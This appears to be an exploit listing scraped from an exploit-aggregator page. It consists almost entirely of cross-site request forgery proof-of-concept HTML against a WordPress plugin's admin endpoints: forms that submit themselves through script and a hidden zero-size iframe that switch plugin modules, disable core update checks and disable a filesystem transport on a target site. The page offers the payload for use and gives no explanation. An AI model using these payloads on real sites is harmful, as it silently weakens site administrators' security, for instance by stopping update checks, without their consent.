Share
## https://sploitus.com/exploit?id=WPEX-ID:C7906B1D-25C9-4F34-BD02-66824878B88E
<form id="test" action="https://example.com/wp-admin/admin-post.php?action=core_control-modules" method="POST">
    <input type="text" name="check-all" value="on">
    <input type="text" name="checked[]" value="core_control_filesystem.php">
    <input type="text" name="checked[]" value="core_control_http.php">
    <input type="text" name="checked[]" value="core_control_updates.php">
    <input type="text" name="checked[]" value="core_control_http_log.php">
    <input type="text" name="checked[]" value="core_control_cron.php">
</form>
<script>
    document.getElementById("test").submit();
</script>


<form id="test" action="https://example.com/wp-admin/admin-post.php?action=core_control-updates" method="POST">
    <input type="text" name="disable-core-check" value="Disable Core update checks">
</form>
<script>
    document.getElementById("test").submit();
</script>


<iframe src="https://example.com/wp-admin/admin-post.php?action=core_control-fs&module_action=disabletransport&transport=ftpext" width="0" height="0" frameborder="0"></iframe>